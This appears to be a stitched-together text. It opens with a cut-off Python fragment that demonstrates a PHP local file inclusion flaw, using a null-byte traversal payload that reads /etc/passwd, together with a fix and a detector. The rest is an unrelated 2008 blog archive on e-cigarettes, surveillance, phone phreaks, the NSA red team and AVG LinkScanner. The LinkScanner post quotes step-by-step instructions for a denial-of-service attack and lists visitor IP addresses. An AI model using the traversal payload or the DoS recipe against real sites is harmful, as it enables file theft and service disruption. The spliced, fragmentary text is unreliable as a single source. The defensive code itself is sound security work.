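ALLOWED_LANGS = {"en", "fr", "de", "es"}    # assumed allow-list of language files


def php_c_string(s):
    """PHP 5.2's include() passed the path to C, so everything after the
    first NUL byte was ignored. That is why the PoC ends in %00."""
    return s.split("\x00", 1)[0]


def vulnerable_resolve(lang_choice):
    """The bug class: an untrusted value concatenated into an include path."""
    raw = php_c_string(f"{LANG_DIR}/{lang_choice}.php")
    return posixpath.normpath(raw)        # the OS collapses the ../ segments


def safe_resolve(lang_choice):
    """Hardened: map the parameter onto a fixed set of known files only."""
    if lang_choice not in ALLOWED_LANGS:
        raise ValueError(f"unsupported language: {lang_choice!r}")
    return f"{LANG_DIR}/{lang_choice}.php"


def lfi_indicators(form_body):
    """Flag form parameters carrying traversal or NUL bytes after URL-decoding."""
    findings = {}
    for name, values in parse_qs(form_body, keep_blank_values=True).items():
        for v in values:
            hits = []
            if "../" in v or "..\\" in v:
                hits.append("traversal")
            if "\x00" in v:
                hits.append("null-byte")
            if hits:
                findings[name] = hits
    return findings


# Constructed copy of the advisory's request (not a live capture).
SAMPLE_REQUEST = (
    "POST /user/index.php HTTP/1.1\r\n"
    "Host: 192.168.1.107\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 39\r\n"
    "\r\n"
    "langChoice=../../../../../etc/passwd%00"
)


def check_request(raw):
    """Split a raw HTTP request and run the indicator check on its body."""
    body = raw.split("\r\n\r\n", 1)[1] if "\r\n\r\n" in raw else ""
    return lfi_indicators(body)


if __name__ == "__main__":
    payload = "../../../../../etc/passwd\x00"
    print("vulnerable include resolves to:", vulnerable_resolve(payload))
    print("request indicators:", check_request(SAMPLE_REQUEST))
    try:
        safe_resolve(payload)
    except ValueError as err:
        print("hardened lookup rejects it:", err)
```

The allow-list is the real fix: it removes the file system from the decision entirely, so neither the null-byte truncation nor later PHP versions that block it matter.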


Posted on Tue, Jul 15, 2008 by John Jolly

The E-Cigarette: The Safer Cigarette

THE E-CIGARETTE: An e-cigarette. The white portion is the battery, the middle part (white with a small hole) is the atomizer and the brown portion is the mouthpiece and cartridge.

I recently learned from a fellow co-worker of mine of an amazing new safer alternative to smoking known as the e-cigarette. The device takes the form of a tiny rod which is slightly longer than a normal cigarette. The mouthpiece of the device contains a replaceable cartridge filled with liquid. The main substances contained in the liquid are nicotine and propylene glycol.

When the user inhales through the device, the air flow is detected by a sensor. A microprocessor then activates an atomizer or nebulizer which injects tiny droplets of the liquid into the flowing air and vaporizes the nicotine. This produces a vapor mist which is inhaled by the user. The addition of propylene glycol to the liquid makes the mist better resemble normal cigarette smoke. The microprocessor also activates an orange LED at the tip to simulate real smoking.

E-cigarettes generally use a rechargeable battery as a power source. Battery life varies between devices, with some lasting a day between charges, and others lasting a week.

Developed in China by Hon Lik of Ruyan, the technology is patent pending worldwide.

Cartridges for e-cigarettes are usually offered in a variety of formulations, with different flavors and nicotine concentrations. At the upper range of nicotine concentrations, e-cigarette smoking is equivalent in nicotine delivery to average tobacco cigarettes. Most companies also offer a range of milder options, including completely nicotine-free cartridges. Depending on the device, the solution cartridges are good for between 100 and 600 drags. An empty cartridge can be replaced with a new cartridge or it can be refilled with solution. This solution is sometimes called e-liquid and is often sold in bottles of 10 ml. The Ruyan patent application mentions four different recipes for the nicotine solution:

Substance              Recipe 1   Recipe 2   Recipe 3   Recipe 4
Propylene Glycol       85%        80%        90%        80%
Nicotine               6%         4%         2%         0.1%
Glycerol               2%         5%         -          5%
Tobacco Essence        -          4%         4.5%       1%
Essence                2%         -          1%         1%
Organic Acid           1%         -          -          2%
Anti-Oxidation Agent   1%         -          -          -
Butyl Valerate         -          1%         -          -
Isopentyl Hexonate     -          1%         -          -
Lauryl Laurate         -          0.6%       -          -
Benzyl Benzoate        -          0.4%       -          -
Methyl Octynicate      -          0.5%       -          -
Ethyl Heptylate        -          0.2%       -          -
Hexyl Hexanoate        -          0.3%       -          -
Geranyl Butyrate       -          2%         -          -
Menthol                -          0.5%       -          -
Citric Acid            -          0.5%       2.5%       -
Water                  -          -          -          2.9%
Alcohol                -          -          -          8%

Gamucci Electronic Cigarette

E-cigarettes are marketed as a healthier alternative to tobacco smoking, since most of the harmful material produced by the combustion of tobacco in traditional cigarettes is not present in the atomized liquid of e-cigarettes. They have also been marketed as a way to keep or curtail an addiction to nicotine.

Various toxicological studies of the electronic cigarettes have been conducted, with some concluding that electronic cigarettes are less harmful than traditional tobacco cigarettes, because they can deliver nicotine into the lungs without the carcinogens and toxicants. Nevertheless, the devices still deliver nicotine, which is linked to several harmful circulatory diseases.

RUYAN Electronic Cigarette

I’m sure that the large American tobacco companies are in the process of doing everything in their power to retain their control on what is a billion dollar business.

In the European Union, some countries have made decisions on the legal status of e-cigarette products.

  • In Austria the e-cigarette is seen as a medical device and the nicotine cartridges are considered a medicinal product. This means that an e-cigarette needs to be CE-marked and the nicotine cartridges must be registered as medicinal products before they can be sold.
  • In the United Kingdom, electronic cigarette use is currently unrestricted, with celebrity nightclub Chinawhite allowing use of the devices indoors, where traditional cigarette smoking is prohibited.
  • In The Netherlands the use of the e-cigarette is allowed but advertising the electronic cigarette is forbidden as long as no European legislation or guideline exists.

For more information, make sure to check out this video.

Posted on Thu, Jul 10, 2008 by John Jolly

Domestic Spying Quietly Goes On

With all the talk about the new wiretapping law the Senate is expected to approve this week, there are many federal surveillance programs that are going largely ignored, unmentioned — and unmonitored.

A story from the Baltimore Sun points out how limited the proposed FISA legislation is when considered against the whole alphabet soup of surveillance programs run by the federal government.

Although the latest FISA proposal includes numerous provisions for a secret court to monitor and authorize surveillance, and for inspectors general to keep tabs on who’s being monitored by various agencies, little oversight exists for surveillance programs that fall outside FISA scrutiny.

For example, the new law will limit whether a CIA transcript of a conversation between an alleged terrorist and his relative in the United States could be shared with other spy agencies and analysts.

But it would have little control over whether, say, the Department of Homeland Security can share wiretaps or satellite surveillance with local law enforcement officials.

Lawmakers on Capitol Hill have requested information about these other surveillance programs, but many agencies are often reluctant to comply, citing security or secrecy concerns, the Sun reports:

Even when Congress has received information, lawmakers say their questions or concerns are often addressed within the agency that is responsible for the surveillance, amounting to a practice of self-policing.

“You don’t have to look far into history to know that when the government, any government, is given secret authorities, that those authorities are ultimately abused,” said Mike German, a former FBI agent who is now policy counsel for the American Civil Liberties Union. “You don’t even have to attribute bad motives to anyone. In an intelligence officer’s zeal to protect the country, they often will overstep their bounds.”

In response to concerns, the Department of Homeland Security has created a privacy czar to see that federal agencies do not infringe on privacy laws or violate civil liberties. But some suggest that should be a Cabinet-level post in the executive branch since new technologies are constantly creating new questions and concerns.

“We should have what Canada has, which is a minister of privacy, someone looking out for the privacy issues of Americans,” said James Bamford, an intelligence expert and author on two books about the history of the NSA. “We have armies of people out there trying to pick into everyone’s private life, but we have nobody out there who’s an advocate.”

Meanwhile, the Wall Street Journal reports today about concerns that non-government surveillance is being abused for advertising purposes.

Wednesday, the Senate Commerce, Science and Transportation Committee plans a hearing on the privacy issues raised by online advertising. Critics, meanwhile, are questioning whether the practices used by NebuAd and other ad-targeting companies violate wiretap laws, which prevent carriers from monitoring customer communications.

FBI Illegally Tapped Phone Phreaks In 1969

In 1971, Ron Rosenbaum’s Esquire article, “Secrets of the Little Blue Box”, introduced America to phone phreaks, a subterranean network of geek explorers who probed the global phone system as the world’s largest pre-Internet interconnected machine. A star of Rosenbaum’s piece was Joe Engressia, a blind telephonic hacking pioneer with perfect pitch and a high IQ, who seized control over phone systems by whistling dual-tone, multi-frequency pitches into telephone receivers.

Before the introduction of modern phone-switching technology, audible tones were used to connect phones with distant destinations. As a young child, Engressia was obsessed with the telephone, finding comfort within the steady blare of the dial tone. At the age of 5, he discovered he could dial the phone by clicking the receiver’s hang-up switch, and at 7 he accidentally discovered that whistling specific frequencies could activate phone switches. From there, experimentation, brilliance, networking and perseverance led Engressia to probe weaknesses in the network that allowed him to make free phone calls. His mastery over this global machine was liberating, if not obsessive.

As Rosenbaum was completing his 1971 article, Engressia was arrested for theft of telephone services. At the time it appeared that the phone company had only recently become aware of his activities – though a few years earlier he had been expelled from the University of South Florida for selling fellow students long-distance calls for a dollar each.

Rosenbaum’s 1971 piece put the spotlight on Engressia, as newspapers, magazines and television programs ran features on him and his activities. Engressia became a cultural icon, or proto-hacker stereotype, as characters with his abilities were written into cyberpunk novels and Hollywood screenplays with characters like Sneakers’ Erwin ‘Whistler’ Emory.

Engressia’s IQ loomed somewhere above 170, but as an adult he wished to live as a 5-year-old, founding his own church, the Church of Eternal Childhood. His wish to remain an eternal child appears to be linked to the repeated sexual abuse he reported suffering from a nun at the school for the blind that he attended as a child, as well as the academic pressures that led him to miss out on playtime as a child. In 1991, Engressia legally changed his name to Joybubbles. Until his death this last year, Joybubbles ran a phone “story line” in Minneapolis, where callers would call and hear him tell a different children’s story each week – adopting a cadence and personal style reminiscent of his hero, Mister Rogers.

When Joybubbles died last year, I used the Freedom of Information Act to request his FBI file, mostly just to see what the FBI had made of this explorer who had loved and wandered through this pre-Internet global network. I figured there might be something in his file relating to his 1971 arrest, but I hadn’t expected to find an FBI and phone company investigation of him from two years before this arrest.


Posted on Tue, Jul 1, 2008 by John Jolly

Inside NSA Red Team Secret Ops With Government's Top Hackers


When it comes to the U.S. government’s computer security, we in the tech press have a habit of reporting only the bad news—for instance, last year’s hacks into Oak Ridge and Los Alamos National Labs, a break-in to an e-mail server used by Defense Secretary Robert Gates … the list goes on and on. Frankly that’s because the good news is usually a bunch of nonevents: “Hackers deterred by diligent software patching at the Army Corps of Engineers.” Not too exciting.

So, in the world of IT security, it must seem that the villains outnumber the heroes—but there are some good-guy celebrities in the world of cyber security. In my years of reporting on the subject, I’ve often heard the National Security Agency’s red team referred to with a sense of breathless awe by security pros. These guys are purported to be just about the stealthiest, most skilled firewall-crackers in the game. Recently, I called up the secretive government agency and asked if it could offer up a top red teamer for an interview, and, surprisingly, the answer came back, “Yes.”

What are red teams, you ask? They’re sort of like the special forces units of the security industry—highly skilled teams that clients pay to break into the clients’ own networks. These guys find the security flaws so they can be patched before someone with more nefarious plans sneaks in. The NSA has made plenty of news in the past few years for warrantless wiretapping and massive data-mining enterprises of questionable legality, but one of the agency’s primary functions is the protection of the military’s secure computer networks, and that’s where the red team comes in.

In exchange for the interview, I agreed not to publish my source’s name. When I asked what I should call him, the best option I was offered was: “An official within the National Security Agency’s Vulnerability Analysis and Operations Group.” So I’m just going to call him OWNSAVAOG for short. And I’ll try not to reveal any identifying details about the man whom I interviewed, except to say that his disciplined, military demeanor shares little in common with the popular conception of the flippant geek-for-hire familiar to all too many movie fans (Dr. McKittrick in WarGames) and code geeks (n00b script-kiddie h4x0r in leetspeak).

So what exactly does the NSA’s red team actually do? They provide “adversarial network services to the rest of the DOD,” says OWNSAVAOG. That means that “customers” from the many branches of the Pentagon invite OWNSAVAOG and his crew to act like our country’s shadowy enemies (from the living-in-his-mother’s-basement code tinkerer to a “well-funded hacker who has time and money to invest in the effort”), attempting to slip in unannounced and gain unauthorized access.

These guys must conduct their work without doing damage to or otherwise compromising the security of the networks they are tasked to analyze—that means no denial-of-service attacks, malicious Trojans or viruses. “The first rule,” says OWNSAVAOG, “is ‘do no harm.’” So the majority of their work consists of probing their customers’ networks, gaining user-level access and demonstrating just how compromised the network can be. Sometimes, the red team will leave an innocuous file on a secure part of a customer’s network as a calling card, as if to say, “This is your friendly NSA red team. We danced past the comical precautionary measures you call security hours ago. This file isn’t doing anything, but if we were anywhere near as evil as the hackers we’re simulating, it might just be deleting the very government secrets you were supposed to be protecting. Have a nice day!”


Posted on Tue, Jul 1, 2008 by John Jolly

Shmoocon Conference Videos Online

Shmoocon, founded in 2005, is an American hacker convention organized by The Shmoo Group and held in the Washington, DC area. It was created as a more affordable alternative to the Black Hat conference. There are normally about 35 talks and presentations on a variety of subjects related to computer security and cyberculture. The Shmoo Group has recently released videos of their conference talks for all to enjoy.

Videos from Shmoocon 2008:


Posted on Mon, Jun 30, 2008 by John Jolly

Grisoft AVG LinkScanner as a DoS Tool?

AVG recently activated their LinkScanner product. It scans every result on a search page by downloading each linked page. This has skewed web analytics data on many websites (each scan is recorded as a visit even though no human viewed the page) and produced DDoS-like effects for sites that appear in many popular searches: LinkScanner downloads all 10, 25, 50 or 100 results on the page even if the visitor never intends to visit the site.

LinkScanner is also easy to game. Several features give its presence away, not least the odd User-Agent string, so a malicious site can serve LinkScanner “nice” content and deliver something else once the user clicks the link in the SERPs.

A “proof of concept” of this attack is explained:


Here’s how to do a DoS attack with your free AVG 8 download with LinkScanner, available from CNET’s download.com:

1. Set your Google preference to 100 links per page.
2. Search for site:www.byebyesucker.com in Google.
3. Now AVG’s LinkScanner downloads every one of Google’s links for that site at a rate of about 2 to 12 site pages per second, depending on the page size.
4. Refresh Google’s search results when LinkScanner is nearly finished. There is no caching by LinkScanner, so you can rinse, lather, and repeat.

We tried this on our own site from an average DSL connection, and then looked at our log. LinkScanner grabbed 600 complete pages (but no images) in three minutes flat. This included 230 downloads of the home page and 370 downloads of deep pages that averaged 50K each. The home page pig-out is a LinkScanner specialty — it was presented with a home-page link by Google only twice, which should have meant just two downloads instead of 230.

Of course, if you try this the webmaster might detect it and track you down through your IP address. Here’s what you tell the judge:

“Gosh, Your Honor, I kept getting this gray checkmark from AVG and I tried to get it to turn green by clicking again and again. I don’t dare visit a website that isn’t all green. As you know, Your Honor, the Internet is not a safe place for God-fearing people like us. It’s full of porn and other dangerous stuff. I didn’t think I was doing anything wrong. Please look at all these recommendations for AVG’s security products from respected high-tech reviewers that I’ve collected!”

No one has attacked us, but just from the normal use of the AVG LinkScanner by enthusiastic but clueless AVG customers, we saw our traffic spike on one of our sites. On 2008-06-03 we started counting when a home-page image is fetched. This new method eliminates bots. We had to do this because the previous method of counting the page fetch itself included bots, and the numbers were getting suspicious. Sure enough, a few days later it went crazy. This graph shows the old-style counts on top, and the new-style counts on a blue line below it:


At first we suspected a script kiddie was using this page to test the growth of his nascent botnet, because the IP addresses for the extra traffic came from all over the world. But looking closer, we discovered that the culprit is AVG’s LinkScanner component in the new version of their product. They think it’s really clever to scan every link returned by a search on Google or Yahoo or Live.com, by downloading every site’s home page. This happens even when the searcher never intends to click on any links. In order to foil the bad guys, AVG tries to make the scans appear to be normal traffic from that person’s browser. It’s called “real-time link scanning” and a lot of webmasters are furious. In the end, it’s a lesson in how to stop the bad guys by becoming a bigger bad guy. We had to throw out our old-style graphs, which tracked home page traffic beginning 2006-09-01.

If you are a webmaster, here’s a sample of logs. We pulled these out of our access_log with this command:

grep "GET / " access_log | grep " 200 " | grep -v "http" >newfile

This command asks for the home page downloads without a referrer. For a better check of a daily log, you should cross-check this against a list of IP addresses that downloaded an image from your home page that same day. This will eliminate any real eyeballs, and the IP addresses that remain will be automatic fetches. Some will be real web crawlers, but those tend to grab a single page once or twice a day, and then move along. Using this technique, you can zero in on the IP addresses of AVG users. Currently there are two typical user-agents in use, but this is expected to change.


151.80.8.182 - - [26/Jun/2008:15:59:58 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
166.82.153.56 - - [26/Jun/2008:16:01:45 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.74.194.58 - - [26/Jun/2008:16:03:30 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.153.219.173 - - [26/Jun/2008:16:03:45 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.42.17.151 - - [26/Jun/2008:16:04:18 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.42.17.151 - - [26/Jun/2008:16:04:18 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
71.93.77.12 - - [26/Jun/2008:16:06:58 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.188.105.227 - - [26/Jun/2008:16:07:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.188.105.227 - - [26/Jun/2008:16:07:55 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.188.105.227 - - [26/Jun/2008:16:08:00 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
71.52.168.50 - - [26/Jun/2008:16:08:12 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
190.51.252.203 - - [26/Jun/2008:16:11:39 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.183.78.109 - - [26/Jun/2008:16:11:51 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.186.130.118 - - [26/Jun/2008:16:13:20 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.166.79.223 - - [26/Jun/2008:16:14:40 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.137.193.72 - - [26/Jun/2008:16:16:10 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.157.155.19 - - [26/Jun/2008:16:19:34 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.131.108.17 - - [26/Jun/2008:16:20:12 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
189.25.180.208 - - [26/Jun/2008:16:23:05 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
76.11.24.146 - - [26/Jun/2008:16:23:42 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
24.149.48.161 - - [26/Jun/2008:16:28:34 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.121.168.15 - - [26/Jun/2008:16:41:05 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.230.165.141 - - [26/Jun/2008:16:43:02 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.188.105.227 - - [26/Jun/2008:16:45:00 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.188.105.227 - - [26/Jun/2008:16:45:08 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.188.105.227 - - [26/Jun/2008:16:45:22 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.56.82.163 - - [26/Jun/2008:16:45:28 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
98.221.155.122 - - [26/Jun/2008:16:49:52 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.221.63.215 - - [26/Jun/2008:16:53:56 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
201.35.234.217 - - [26/Jun/2008:16:55:14 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
24.64.223.204 - - [26/Jun/2008:16:56:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
75.23.220.22 - - [26/Jun/2008:16:57:19 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
86.17.203.158 - - [26/Jun/2008:16:57:22 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
79.22.215.251 - - [26/Jun/2008:16:57:40 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
75.70.75.226 - - [26/Jun/2008:16:57:41 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
75.70.75.226 - - [26/Jun/2008:16:57:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
82.18.49.107 - - [26/Jun/2008:17:00:39 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.153.117.96 - - [26/Jun/2008:17:01:04 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
71.206.201.239 - - [26/Jun/2008:17:01:14 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
98.221.155.122 - - [26/Jun/2008:17:29:07 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
71.81.50.51 - - [26/Jun/2008:17:30:29 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.164.8.43 - - [26/Jun/2008:17:30:32 -0400] "GET / HTTP/1.0" 200 6909 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.7.5) Gecko/20041108 Firefox/1.0"
24.119.124.97 - - [26/Jun/2008:17:30:59 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.142.244.209 - - [26/Jun/2008:17:34:48 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.69.119.178 - - [26/Jun/2008:17:36:50 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.145.101.5 - - [26/Jun/2008:17:50:46 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
76.66.56.189 - - [26/Jun/2008:17:52:46 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.164.8.43 - - [26/Jun/2008:17:59:40 -0400] "GET / HTTP/1.0" 200 6909 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.7.5) Gecko/20041108 Firefox/1.0"
92.0.150.180 - - [26/Jun/2008:18:00:46 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.62.142.170 - - [26/Jun/2008:18:02:26 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
64.126.72.52 - - [26/Jun/2008:18:13:53 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
70.171.216.33 - - [26/Jun/2008:18:14:03 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
12.214.27.179 - - [26/Jun/2008:18:16:20 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.231.107.177 - - [26/Jun/2008:18:23:37 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
There are two legitimate Linux fetches in this list, but you can see the two user-agents that are currently being used. The “1813” user-agent is disappearing now, in favor of the “SV1”. Presumably this is because users are clicking the “update” button on their AVG installation and getting new instructions. The CNET download we did that same day used only 1813. That’s probably because we were careful to refuse any updates from AVG as we installed it, by disallowing access when our firewall popped up and notified us that some new program was trying to connect to the Internet. AVG’s stated intention is to make their prefetches look like normal browser visits, in order to hide their presence from bad guys.
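Site operators who want these prefetches kept out of their visitor statistics need a rule they can run over the raw access log. The following is an added example, not code from the original post or from AVG: a small Python parser for Apache combined-format lines that tags the only two markers actually visible in the excerpt above, the ";1813" user-agent (note the missing space) and the malformed value that begins with the literal text "User-Agent: ". The sample lines are constructed, modelled on the quoted log, with documentation-range IP addresses.

```python
import re
from collections import Counter

# Constructed sample in Apache combined log format, modelled on the excerpt
# quoted above. Addresses and the final line are made up for the example.
SAMPLE_LOG = """\
203.0.113.10 - - [26/Jun/2008:17:29:07 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.0.113.11 - - [26/Jun/2008:17:30:32 -0400] "GET / HTTP/1.0" 200 6909 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.7.5) Gecko/20041108 Firefox/1.0"
203.0.113.12 - - [26/Jun/2008:17:34:48 -0400] "GET / HTTP/1.1" 200 6909 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.0.113.13 - - [26/Jun/2008:17:50:46 -0400] "GET / HTTP/1.1" 200 6909 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
203.0.113.14 - - [26/Jun/2008:18:02:26 -0400] "GET /about.html HTTP/1.1" 200 4120 "http://example.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
"""

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def classify_ua(ua):
    """Return a tag naming the prefetch marker found in the user-agent, or None.

    Only the two markers visible in the quoted log are used:
      - a value that starts with 'User-Agent: ' (the header name leaked into the value)
      - a value ending in ';1813)' (the older LinkScanner string, no space before 1813)
    The 'SV1' variant is a genuine IE6 SP2 string and is deliberately NOT flagged:
    by user-agent alone it is indistinguishable from a real browser.
    """
    if ua.startswith("User-Agent: "):
        return "header-name-in-value"
    if ua.endswith(";1813)"):
        return "linkscanner-1813"
    return None


def scan(log_text):
    """Parse every line of the log and attach a 'tag' field to each record."""
    records = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not in combined format
        rec["tag"] = classify_ua(rec["ua"])
        records.append(rec)
    return records


def summarize(records):
    """Count records per tag; untagged records are reported as 'unflagged'."""
    return Counter(rec["tag"] or "unflagged" for rec in records)


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(f'{rec["ip"]:<14} {rec["path"]:<12} {rec["tag"] or "-":<22} {rec["ua"]}')
    print(summarize(scan(SAMPLE_LOG)))
```

The two flagged lines are the ones a log filter can drop with confidence; the "SV1" hits are left alone on purpose, which is exactly the problem the post describes: once the prefetch string matches a stock IE6 SP2 browser, the user-agent no longer tells the operator anything, and the only remaining clues are behavioural (single root fetch, no referer, no follow-up requests), which this example does not try to judge.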

This LinkScanner component is not a minor issue. AVG claims five million downloads of this free security product during the last week of May, and 70 million users worldwide. We can’t wait until they all get updated with what LinkScanner has to offer.
Posted on Sat, Jun 28, 2008 by John Jolly

D.O.J. Press Release: Individuals Named in Swatting Conspiracy Charged with Obstruction of Justice

INDIVIDUALS NAMED IN SWATTING CONSPIRACY CHARGED WITH OBSTRUCTION OF JUSTICE

DALLAS — An un-indicted co-conspirator in a swatting conspiracy case that was recently prosecuted in the Northern District of Texas, who was a minor when the case was filed, has now been charged by a federal grand jury with obstruction of justice and conspiring to obstruct justice for threatening a witness in that case, announced U.S. Attorney Richard B. Roper of the Northern District of Texas. The grand jury also charged two other defendants in the same indictment with related offenses.

